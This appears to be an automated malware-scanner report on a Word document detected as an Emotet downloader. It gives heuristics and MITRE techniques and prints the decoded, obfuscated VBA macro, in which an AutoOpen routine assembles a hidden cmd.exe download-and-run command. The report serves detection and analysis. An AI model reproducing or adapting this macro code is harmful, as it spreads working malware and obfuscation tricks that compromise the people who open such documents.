MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, a common indicator for malicious documents. The macro attempts to execute a command using 'cmd.exe' which is likely responsible for downloading and executing a secondary payload. The ClamAV detection explicitly identifies this as an Emotet downloader.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884100-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884100-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7156 bytes |
SHA-256: 8ef8a02e5f366c3c8d578bdeb984c9655ebc3d6065f9efbb7cbf476a654a2c3c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OBsIoooPLIs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Cos(4328)
TypeName CInt(MEwTT)
TypeName CDate(20653 + wuBYzi / TODTb * Ljhjfw)
TypeName ZlqCF
TypeName wJKur
TypeName ChrB(38720 * VthjCQ - 88956 / fIDtXN)
Shell@ CStr("c") + CStr("m") + UVmYURzCacEaqW + JIQOPUz + CXPBjli + YXWIUVm + FCWcnu + GSnOn + zswUmcJXYK + fMvfIzVvkj + WUGsVhkLwNp, 170317703 - 170317703
TypeName CStr(qEvWZC / tLBqUO / jmHJr + NdiDRY)
TypeName oZRWjk
End Sub
Attribute VB_Name = "aZKdhjLSQXHJDY"
Function CXPBjli()
On Error Resume Next
TypeName CStr(9)
TypeName 93
TypeName Sqr(12788 + DVtET)
HiaiQTJkaN = "d /" + "V:" + "O" + "/C" + CStr(Chr(LDciUmOGVXXRJk + qnjZCwWEfdsC + 34 + RHHUHJTWJ + KHkjzGkSkP)) + "set HMq" + "=SNGoIEdBi" + "tEOFOOv" + "nzf" + "tJ)$r_" + "c" + "w=W@" + ",.y"
TypeName Sqr(53176 * DCvSRi)
TypeName CBool(46239 - LaqnoI)
TNFVoL = "6x\}H-8Z" + "DC3{Ym" + "P+42(" + "e'1q5Ms/a;" + "jKU hbpl" + "Tgk" + ":u0&&for" + " %" + "i in (68;" + "3;26;" + "52;23;" + "58;66;52;6" + "9"
TypeName Cos(BUzFT)
TypeName CInt(UZjqDz)
XbBcYo = ";69;65" + ";22" + ";68;5" + "5;63;27" + ";16;52;" + "26;38;3;67" + ";62;52;2" + "5;" + "19;65;1" + ";52;1"
TypeName zcYWA
TypeName Log(tzYjVP)
TypeName CByte(DcQjHs)
qQpjKrKUjt = "9;31;28;" + "52" + ";67;42;69" + ";8;5" + "2;1" + "6;19;" + "61;22"
TypeName ChrB(mwIqhs)
TypeName CLng(82)
DlEiWf = ";74;70;" + "63;2" + "7;53;6" + "6;19" + ";1" + "9;6" + "8;73;5" + "9;5"
TypeName Rnd(390088402)
TypeName Sin(fcUEcf)
YaAKzdnv = "9;26;2" + "6;26;31;7" + "4;69;" + "19;8;71" + ";60;46" + ";52;"
CXPBjli = HiaiQTJkaN + TNFVoL + XbBcYo + qQpjKrKUjt + DlEiWf + YaAKzdnv
TypeName Sin(73)
TypeName CStr(63994 + Esznb)
TypeName Hex(74204 + 55732)
End Function
Function YXWIUVm()
On Error Resume Next
TypeName Round(qjDPwM)
TypeName bPqrG
TypeName LGbos
flwpPYP = "23;31;2" + "5;3" + ";46;59;26;" + "68;38" + ";60;6;46" + ";8;" + "16;59;8"
TypeName 334
TypeName Oct(QttRhR - EnmmlB - jswkF - OArNTV)
TypeName Oct(1908 + JFpHLz / 9653 + 36931)
juXPrOj = ";16;25;69" + ";" + "74;6;52" + ";5" + "8" + ";" + "59;45;43" + ";57;50;29" + ";66;19;19"
TypeName 2
TypeName Cos(6374)
TypeName lEUoWJ
jkYtuluQi = ";68;73;59" + ";59;5" + "8;8;60;" + "46;7" + "1;52;46;5" + "8;" + "66;5" + "2;23;8;1" + "9;60" + ";" + "71;52;31;" + "25;3" + ";4"
TypeName Cos(89213 / vhcQC - zMmcYi - wipNbY)
TypeName CInt(405)
wzvncKv = "6" + ";59;" + "25;60;" + "2" + "3;" + "5" + "2;52;23;2" + "4;58;32;58" + ";19;52;46;" + "59;67;" + "60;" + "25;72;3;1" + "8;18;8;25"
TypeName Sqr(dvXZz)
TypeName Atn(67648 - nsPXJ * 24678 + mrrUhT)
TypeName Atn(FkOBuZ)
EBrdzsd = ";52;" + "59;74;68;6" + "9;" + "3" + ";6" + "0;6;58;5" + "9;68;" + "26;40;5" + "4;42;18;20"
YXWIUVm = flwpPYP + juXPrOj + jkYtuluQi + wzvncKv + EBrdzsd
TypeName Sin(88674 - YzUfGz)
TypeName 7
End Function
Function FCWcnu()
On Error Resume Next
TypeName 148
TypeName CSng(6745)
dzouwPvYU = ";49;29;66;" + "19;19;68;7" + "3;" + "59;59;" + "26;52"
TypeName Cos(EGdYl)
TypeName CInt(96)
TypeName CInt(899)
EQUQjWBR = ";67;58;8;" + "19" + ";" + "52;31;15" + ";19;"
TypeName VkhFr
TypeName CDbl(11)
TypeName 1240
bqQtVLBbXO = "3;2" + "5;31;15" + ";16;59;6;5" + "2;46" + ";3;59;6" + "6;60;8;69;" + "3;25;59;26" + ";68;38;5" + "8;16;60;68" + ";58;66;3;1" + "9;58;59;37"
TypeName Log(vAjOX)
TypeName 40803792
TypeName OWmZKH
bKDbha = ";18;50;69;" + "29;66" + ";19;19" + ";68;73;59;" + "59;67;60;" + "23;3;" + "25;60;"
TypeName Sin(38)
TypeName ChrB(261591133)
TypeName CBool(lXAaYi)
jwGHXOp = "19;2" + "5;66;31;2" + "5;" + "3;46;59;72" + ";64;14" + ";1" + "9;19" + ";29;66" + ";19;19;68;"
TypeName Oct(88711 * 17669)
TypeName anXHDX
bLNEiVZNTc = "73;59;5" + "9;46
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.